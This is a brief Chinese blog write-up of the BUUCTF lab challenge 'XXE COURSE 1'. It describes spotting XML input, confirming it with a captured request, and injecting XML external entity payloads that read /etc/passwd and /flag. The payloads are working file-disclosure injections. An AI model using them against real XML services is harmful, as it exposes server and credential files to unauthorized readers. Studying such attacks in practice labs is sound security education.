BUU XXE COURSE 1

2025-3-25 21:41

|

BUUCTF,CTF,CTF-web

|

66

90 字

|

2 分钟

本文最后更新于108 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

一、信息收集一下

Pasted image 20250325211207.png

查看源代码

Pasted image 20250325211252.png

发现是xml，可能存在xxe漏洞

二、抓包进一步验证

Pasted image 20250325211749.png

发现有xml声明，确实可能存在xxe漏洞

三、尝试获取flag

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Pasted image 20250325212106.png

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag">]>

Pasted image 20250325211421.png

没想到一下就成功了

总结

xxe漏洞

文末附加内容

xxe

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!